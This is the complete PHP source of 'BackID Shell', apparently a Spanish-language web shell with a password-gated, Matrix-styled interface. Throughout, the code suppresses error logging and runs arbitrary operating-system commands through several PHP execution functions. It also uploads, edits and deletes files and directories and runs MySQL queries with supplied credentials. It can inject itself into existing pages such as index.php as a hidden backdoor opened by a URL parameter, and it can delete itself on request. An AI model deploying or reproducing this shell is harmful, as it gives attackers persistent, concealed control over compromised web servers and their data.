BackID Shell

<?php
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
define('VERSION', '0.2');
define('NAME', 'BackID - shell v'.VERSION);
define('TITLE', 'BackID v0.2'); //podes cambiarlo por lo que quieras que aparezca en la index :)
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}

$pass = "contrasena";
//+--+--+--+--+--+--+--+--+--+--+--+--+-- Termina Configuracion jejejeje +-++-++-++-++-++-++-++-++-++-++-++-+-//


session_start();
if(isset($_GET['exit'])) { session_unset(); unset($_SESSION); session_destroy(); die("<script> window.location='" . $_SERVER['SCRIPT_NAME'] . "'; </script>"); }
if(!(isset($_SESSION['logged']) && $_SESSION['logged'] != ""))
{
    if($_POST['password'] == $pass)
    {
        session_start();
        $_SESSION['logged'] = "yessss";
        header("Location: ".$_SERVER['SCRIPT_NAME']);
    }
    ?>
    <html>
    <head>
    <title><?php echo TITLE; ?></title>
    <style type="text/css">
    @import url(http://fonts.googleapis.com/css?family=Iceland);
    .matrix { font-family: Iceland, Lucida Console, Courier, Monotype; font-size:14pt; text-align:center; width:15px; padding:0px; margin:0px;}
    </style>

    <script type="text/javascript" language="JavaScript">

    <!--
    var rows=21;
    var speed=3;
    var reveal=3;
    var effectalign="default";

    var w3c=document.getElementById && !window.opera;;
    var ie45=document.all && !window.opera;
    var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
    var m_coch=new Array();
    var m_copo=new Array();
    window.onload=function() {
       if (!w3c && !ie45) return
      var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
      ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
      ma_txt=" "+ma_txt+" ";
      columns=ma_txt.length;
      if (w3c) {
        while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
        ma_tab=document.createElement("table");
        ma_tab.setAttribute("border", 0);
        ma_tab.setAttribute("align", effectalign);
        ma_tab.style.backgroundColor="#000000";
        ma_bod=document.createElement("tbody");
        for (x=0; x<rows; x++) {
          ma_row=document.createElement("tr");
          for (y=0; y<columns; y++) {
            matemp=document.createElement("td");
            matemp.setAttribute("id", "Mx"+x+"y"+y);
            matemp.className="matrix";
            matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
            ma_row.appendChild(matemp);
          }
          ma_bod.appendChild(ma_row);
        }
        ma_tab.appendChild(ma_bod);
        matrix.appendChild(ma_tab);
      } else {
        ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
        for (var x=0; x<rows; x++) {
          ma_tab+='<t'+'r>';
          for (var y=0; y<columns; y++) {
            ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'">&nbsp;</'+'td>';
          }
          ma_tab+='</'+'tr>';
        }
        ma_tab+='</'+'table>';
        matrix.innerHTML=ma_tab;
      }
      ma_cho=ma_txt;
      for (x=0; x<columns; x++) {
        ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
        m_copo[x]=0;
      }
      ma_bod=setInterval("mytricks()", speed);
    }

    function mytricks() {
      x=0;
      for (y=0; y<columns; y++) {
        x=x+(m_copo[y]==100);
        ma_row=m_copo[y]%100;
        if (ma_row && m_copo[y]<100) {
          if (ma_row<rows+1) {
            if (w3c) {
              matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
              matemp.firstChild.nodeValue=m_coch[y];
            }
            else {
              matemp=document.all["Mx"+(ma_row-1)+"y"+y];
              matemp.innerHTML=m_coch[y];
            }
            matemp.style.color="#33ff66";
            matemp.style.fontWeight="bold";
          }
          if (ma_row>1 && ma_row<rows+2) {


    matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
            matemp.style.fontWeight="normal";
            matemp.style.color="#00ff00";
          }
          if (ma_row>2) {


    matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
            matemp.style.color="#009900";
          }
          if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
          else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
          else if (ma_row<rows+2) m_copo[y]++;
          else if (m_copo[y]<100) m_copo[y]=0;
        }
        else if (Math.random()>0.9 && m_copo[y]<100) {
          m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
          m_copo[y]++;
        }
      }
      if (x==columns) clearInterval(ma_bod);
    }

    function zoomer(ycol) {
      var mtmp, mtem, ytmp;
      if (m_copo[ycol]==Math.floor(rows/2)+1) {
        for (ytmp=0; ytmp<rows; ytmp++) {
          if (w3c) {
            mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
            mtmp.firstChild.nodeValue=m_coch[ycol];
          }
          else {
            mtmp=document.all["Mx"+ytmp+"y"+ycol];
            mtmp.innerHTML=m_coch[ycol];
          }
          mtmp.style.color="#33ff66";
          mtmp.style.fontWeight="bold";
        }
        if (Math.random()<reveal) {
          mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
          ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
        }
        if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
        m_copo[ycol]+=199;
        setTimeout("zoomer("+ycol+")", speed);
      }
      else if (m_copo[ycol]>200) {
        if (w3c) {
          mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
          mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
        }
        else {
          mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
          mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
        }
        mtmp.style.fontWeight="normal";
        mtem.style.fontWeight="normal";
        setTimeout("zoomer("+ycol+")", speed);
      }
      else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
      if (m_copo[ycol]>100 && m_copo[ycol]<200) {
        if (w3c) {
          mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
          mtmp.firstChild.nodeValue=String.fromCharCode(160);
          mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
          mtem.firstChild.nodeValue=String.fromCharCode(160);
        }
        else {
          mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
          mtmp.innerHTML=String.fromCharCode(160);
          mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
          mtem.innerHTML=String.fromCharCode(160);
        }
        setTimeout("zoomer("+ycol+")", speed);
      }
    }
    // -->
    </script>
    </head>
    <body style="background:black;">
    <br>
    <center><div id="matrix"><?php echo TITLE; ?></div></center>
    <div style="position: absolute; height: 30px; margin: 0px; padding: 0px; text-align: center; top: 100%; margin-top: -30px;">
        <form action="<?php echo "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."?".$_SERVER['QUERY_STRING']; ?>" method="post">
            <input type="password" name="password" style="border : none; background-color: #000; color: #0F0;">
        </form>
    </div>
    </body>
    </html>


<?php
}
else
{

if(isset($_GET['phpinfo']))
{
    echo "<a href='".$_SERVER['SCRIPT_NAME']."'>Volver</a>";
    die (phpinfo());
}

function auto_inject($p)
{
    $password = "bk_sh";
    $pwd = "\$_GET[\"".$password."\"]";

    $sess = "\$_SESSION[\"".$password."\"]";
    $valid = "\"$password\"";

    $dat_inyectado = file_exists($p)?cargar_datos($p):"";
    $dat_shell = cargar_datos(__FILE__);

    $inyeccion = <<<inyec
    <?php
        error_reporting(0);
        session_start();
        if(isset($pwd))
        {
            $sess = $valid;
        }
        else if(!isset($sess))
        {
            unset($sess);
            session_unset();
            session_destroy();
        }

        if(!(isset($sess) && $sess == $valid))
        {
            ?>
            $dat_inyectado
            <?php
        }
        else
        {
            ?>
            $dat_shell
            <?php
        }
    ?>
inyec;

   if(file_exists($p))
   {
        $finyect = fopen($p, "w");
        if(fwrite($finyect, $inyeccion)) {
            echo "Inyectado correctamente, entra con: ".$p."?".$password;
        }
        else
        {
            echo "No lo logre :/ tocara manualmente";
        }
        fclose($finyect);
   }
   else
   {
        echo "No exite ".$p." se creara el archivo y debe entrar asi: ".$p."?".$password;
        echo "<br>inyectando<br>";

        $finyect = fopen($p, "w");
        if(fwrite($finyect, $inyeccion)) {
            echo "Inyectado correctamente, entra con: ".$p."?".$password;
        }
        else
        {
            echo "No lo logre :/ tocara manualmente";
        }
        fclose($finyect);
   }
}
function cargar_datos($archivo_c)
{
    $archivo_o = fopen($archivo_c, "r");
    $dat_archivo = "";
    while(!feof($archivo_o))
    {
        global $fs_ln;
        $line = fgets($archivo_o);
        if($fs_ln == "") { $fs_ln = $line; }
        $dat_archivo .= $line;
    }
    fclose($archivo_o);
    return $dat_archivo;
}


function exec_all($command)
    {

    $output = '';
    if(function_exists('exec'))
    {
        exec($command,$output);
        $output = join("\n",$output);
    }

    else if(function_exists('shell_exec'))
    {
        $output = shell_exec($command);
    }

    else if(function_exists('popen'))
    {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fread($handle, 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fgets($handle,512);
                }
            }
        }
        pclose($handle);
    }


    else if(function_exists('system'))
    {
        ob_start(); //start output buffering
        system($command);
        $output = ob_get_contents();    // Get the ouput
        ob_end_clean();                 // Stop output buffering
    }

    else if(function_exists('passthru'))
    {
        ob_start(); //start output buffering
        passthru($command);
        $output = ob_get_contents();    // Get the ouput
        ob_end_clean();                 // Stop output buffering
    }

    else if(function_exists('proc_open'))
    {
        $descriptorspec = array(
                1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
                );
        $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fread($pipes[1], 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fgets($pipes[1],512);
                }
            }
        }
        pclose($handle);
    }
    else
    {
        $output = "Ups moita security xDDDD!!!";
    }

    return(htmlspecialchars($output));
}


function eliminarDir($carpeta)
{
    foreach(glob($carpeta . "/*") as $archivos_carpeta)
    {
        echo $archivos_carpeta;

        if (is_dir($archivos_carpeta))
        {
            eliminarDir($archivos_carpeta);
        }
        else
        {
            unlink($archivos_carpeta);
        }
    }
    rmdir($carpeta);
}

    function contar_datos($carp)
    {
        $carp = str_replace(' ', ' ',$carp);
        $carp = str_replace('\\', '/',$carp);
        $carpt = opendir($carp);
        $tot = 0;
        while($list = readdir($carpt)){
        if(ucwords($list) != ".." && ucwords($list) != ".")
        {
            $tot++;
        }
        }
        closedir($carpt);
        return $tot;
    }

    function size($path, $formated = true, $retstring = null){
    if(!is_dir($path) || !is_readable($path)){
        if(is_file($path) || file_exists($path)){
            $size = filesize($path);
        } else {
            return false;
        }
    } else {
        $path_stack[] = $path;
        $size = 0;

        do {
            $path   = array_shift($path_stack);
            $handle = opendir($path);
            while(false !== ($file = readdir($handle))) {
                if($file != '.' && $file != '..' && is_readable($path . DIRECTORY_SEPARATOR . $file)) {
                    if(is_dir($path . DIRECTORY_SEPARATOR . $file)){ $path_stack[] = $path . DIRECTORY_SEPARATOR . $file; }
                    $size += filesize($path . DIRECTORY_SEPARATOR . $file);
                }
            }
            closedir($handle);
        } while (count($path_stack)> 0);
    }
    if($formated){
        $sizes = array('B', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
        if($retstring == null) { $retstring = '%01.2f %s'; }
        $lastsizestring = end($sizes);
        foreach($sizes as $sizestring){
            if($size <1024){ break; }
            if($sizestring != $lastsizestring){ $size /= 1024; }
        }
        if($sizestring == $sizes[0]){ $retstring = '%01d %s'; } // los Bytes normalmente no son fraccionales
        $size = sprintf($retstring, $size, $sizestring);
    }
    return $size;
}

if(isset($_POST['upload'])){

    if(!isset($_POST['dir']) || $_POST['dir'] == "")
    {
        echo "<script>alert('Directorio please');</script>";
    }
    else
    {
        $fname = $_FILES['file_name']['name'];
        $direc = $_POST['dir'];
        if(!move_uploaded_file($_FILES['file_name']['tmp_name'], $direc.$fname))
        {
            echo "<script>alert('Error subiendo archivo');</script>";
        }
        else
        {
            echo "<script>alert('Archivo subido satisfactoriamente');</script>";
        }
    }
}

if(isset($_GET['boom']))
{
    @unlink($_SERVER['SCRIPT_NAME']);
}
?>
<!DOCTYPE html>
<html>
<head>
    <title><?php echo NAME; ?></title>
    <script type="text/javascript" src="http://code.jquery.com/jquery.min.js"></script>
    <style type="text/css">
        @import url(http://fonts.googleapis.com/css?family=Iceland);
        * { font-family: Iceland; color: #0F0; }
        body { background-color: #000; }
        #main { border     : #0F0 solid 1px; border-color: #00ff00; position: relative; }
        #pie { position: absolute; bottom: 0px; }
        body,a:link { background-color: #000000; color: #00F; font-size: small; font-family: Iceland, "Courier New"; cursor: crosshair; }
        a:link,a:visited,a:active { color: #00F; font: normal 15px Iceland, Verdana, Arial, Helvetica, sans-serif; text-decoration: none; }
        #title { font-family: IceLand; font-size: 30px; text-align: center; }
        input, textarea { background-color: #000; color: #0F0; padding: 5px; font-size: 15px; }
        td { border-bottom: 2px dotted #0F0; text-align: center; padding: 5px; margin: 3px; }
    </style>
    <script type="text/javascript">
    $(function()
    {
        $('.it_menu').click(function(){
            $('.active').removeClass('it_menu active').addClass('it_menu');
            $(this).addClass('active');
        });
    });
    </script>

</head>
<body>
    <div id="main">
    <?php echo "&nbsp;&nbsp;&nbsp;&nbsp;". php_uname() . " --- | --- " . getenv('SERVER_SOFTWARE') . " --- | --- <a href=?phpinfo> ver phpinfo </a>"; ?>
    <h1 id="title"><?php echo NAME; ?></h1>
    <div id="content">
    <center>
    <table style="border: #0F0 1px solid; width: 95%; padding: 3px;">
        <tr>
            <td style="width: 50%;">
                <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="get">
                Abrir carpeta<br><input type="text" name="d" value="<?php echo getcwd(); ?>" />&nbsp;&nbsp;<input type="submit" value="Ir a" name="btn_func">
                </form>
            </td>
            <td style="width: 50%;">
                <form enctype="multipart/form-data" action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post">
                    <input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
                    upload file:<input name="file_name" type="file">
                    <br>to dir: <input type="text" name="dir" value="./">&nbsp;&nbsp;<input type="submit" name="upload" value="upload">
                </form>
            </td>
        </tr>
        <tr>
            <td colspan="2">
                Execute MySQL Query:<br>
                <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post" >
                host:<input type="text" name="host" value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
                database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
            </form>
            </td>
        </tr>

        <tr>
        <td style="width: 50%;">
        <center>
        <?php
            if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "deleteD"))
            {
                eliminarDir($_GET['archivo']);
                echo "Carpeta eliminada!!!";
            }
            else if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "deleteA"))
            {
                unlink($_GET['archivo']);
                echo "Archivo eliminado!!!";
            }
        ?>
        <table style="width: 95%; border: 1px #0F0 dashed;">
            <tr>
                <td colspan="4" style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
                    <strong style="color: #000;">Archivos y Directorios</strong>
                </td>
            </tr>
            <tr>
                <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
                    <strong style="color: #000;">Nombre</strong>
                </td>
                <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
                    <strong style="color: #000;">Tamaño</strong>
                </td>
                <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
                    <strong style="color: #000;">Editar</strong>
                </td>
                <td style="color: #000; background-color: #0F0; margin: 3px; height: 20px;">
                    <strong style="color: #000;">Eliminar</strong>
                </td>
            </tr>

            <?php
            $dir = (stristr(php_uname('s'), 'Windows'))?"C:":"/";
            $dir = (isset($_GET['d']) && $_GET['d'] != "")?$_GET['d']:$dir;
            if(@$handle = opendir($dir))
            {
                while (false !== ($archivo = readdir($handle)))
                {
                    echo "<tr>";
                    if($archivo == '.')
                    {
                        echo "<td><a href=\"?d=.\">$archivo</a><br></td>";
                        echo "<td></td>";
                        echo "<td></td>";
                        echo "<td></td>";
                    }
                    elseif($archivo == '..')
                    {
                        if($dir != '.')
                        {
                            $carpetas = explode("/",$dir);
                            array_pop($carpetas);
                            $dir2 = join("/",$carpetas);
                            echo "<td colspan='4'><a href=\"?d=$dir2\">$archivo</a></td>";
                        }
                    }
                    elseif(is_dir($dir."/".$archivo))
                    {
                        echo "<td><a href='?d=".$dir."/".$archivo."'>".$archivo."</a></td>";
                        echo "<td>".contar_datos($dir."/".$archivo)." archv(s)</td>";
                        echo "<td colspan='2'><a onclick='return confirm(\"Eliminar Carpeta?\");' href='?action=deleteD&archivo=".$dir."/".$archivo."'>Eliminar</a></td>";
                    }
                    else
                    {
                        echo "<td>".$archivo."</td>";
                        echo "<td>".size($dir."/".$archivo)."</td>";
                        echo "<td><a href='?action=edit&archivo=".$dir."/".$archivo."'>Modificar</a></td>";
                        echo "<td><a onclick='return confirm(\"Eliminar Archivo?\");' href='?action=deleteA&archivo=".$dir."/".$archivo."'>Eliminar</a></td>";
                    }
                    echo "</tr>";
                    //echo "<i>".$dir."/".$archivo."</i>";
                }
            }
            else
            {
                echo "<span style='color: #F00; font-weight: bolder;'>Error: el directorio $dir no existe...";
            }
        ?>


        </table>
        </center>

        </td>
        <td style="width: 50%; margin-top: 0px;">
        <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
            <input type="text" name="pag" value="index.php" title="A donde me inyecto?" />&nbsp;<input type="submit" name="Inject" value="Inject">
        </form>
        <p style="color: #F00;">
        <?php

        if(isset($_POST["Inject"]) && $_POST["Inject"] == "Inject")
        {
            $pag_iny = isset($_POST['pag'])?$_POST['pag']:"index.php";
            unset($_POST);
            auto_inject($pag_iny);
        }
        ?>
        </p>
        <br><br>

        <?php
            if((isset($_POST['btn_func']) && $_POST['btn_func'] == "Guardar") && (isset($_POST['multilinea']) && $_POST['multilinea'] != "") && (isset($_POST['ruta']) && $_POST['ruta'] != ""))
            {
                $guardar_arc = fopen($_POST['ruta'], 'w');
                if(fwrite($guardar_arc, $_POST['multilinea']))
                {
                    echo "Archivo guardado!!!";
                }
                else
                {
                    echo "<span style='color: #F00;'>No se pudo guardar!!!</span>";
                }
            }
        ?>
        Crear y/o Modificar Archivos
        <br><br>
        <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
            <textarea id="multilinea" name="multilinea" style="width: 95%; height: 150px; resize: none;" readonly="readonly"><?php if(isset($_GET['archivo'], $_GET['action']) && ($_GET['archivo'] != "" && $_GET['action'] == "edit")) { $archivo = file_get_contents($_GET['archivo']); $archivo = ucfirst($archivo); echo htmlentities($archivo); } ?></textarea>
            <br><input type="text" name="ruta" value="<?php if(isset($_GET['archivo']) && $_GET['archivo'] != '') { echo $_GET['archivo']; } ?>" style="width: 50%;">&nbsp;&nbsp;&nbsp;<input type="button" onclick="$(function(){ $('#multilinea').removeAttr('readonly'); });" name="btn_func" id="btn_edit" value="Editar">&nbsp;&nbsp;|&nbsp;&nbsp;<input type="submit" name="btn_func" id="btn_save" value="Guardar">
        </form>

        <br><br>
        Ejecutar Comandos por medio de System
        <br><br>
        <form action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post">
            <textarea id="multilinea" name="multilinea" style="width: 95%; height: 150px; resize: none;" readonly="readonly">
            <?php
            if(isset($_POST['cmd_text'], $_POST['btn_func']) && ($_POST['cmd_text'] != "" && $_POST['btn_func'] == "System"))
            {
                $comando = $_POST['cmd_text'];
                $check = exec_all($comando);
                echo $check;
            }
            if(isset($_POST['mquery']))
            {
                $host=$_POST['host'];
                $usr=$_POST['usr'];
                $passwd=$_POST['passwd'];
                $db=$_POST['db'];
                $mquery=$_POST['mquery'];
                mysql_connect($host, $usr, $passwd);
                    echo mysql_error()?"Error: " . mysql_error():"Conectado\n";
                mysql_select_db($db);
                    echo mysql_error()?"Error: " . mysql_error():"DB seleccionada\n\n";
                $result = mysql_query($mquery);
                if($result)
                {
                    while($line = mysql_fetch_array($result,MYSQL_ASSOC))
                    {
                        print_r ($line);
                    }
                }
                //while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
                //mysql_free_result($result);
                //die;
            }

            ?>
            </textarea>
            <br><input type="text" name="cmd_text" value="<?php echo (isset($_POST['cmd']))?$_POST['cmd']:''; ?>" style="width: 80%;">&nbsp;&nbsp;|&nbsp;&nbsp;<input type="submit" name="btn_func" id="btn_save" value="System">
        </form>
        </td>
        </tr>
    </table>
    <div style="background-color: #000; border: 1px dashed #F00; position: relative; width: 95%; height: 30px; bottom: 0px; cursor: pointer; text-align:center;" >by BacktrackFire &amp;&amp; kid_goth<br>| HackxCrack |</div>
    <center>
    </div>
    <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']; ?>'">Act</div>
    <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; margin-top: 31px; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']."?exit"; ?>'">Exit</div>
    <div style="background-color: #F00; position: fixed; width: 30px; height: 30px; top: 50%; margin-top: 31px; right: 0px; padding-top: 10px; cursor: pointer;" onclick="window.location='<?php echo $_SERVER['SCRIPT_NAME']."?boom"; ?>'">Boom</div>
</body>
</html>
    <?php
}
?>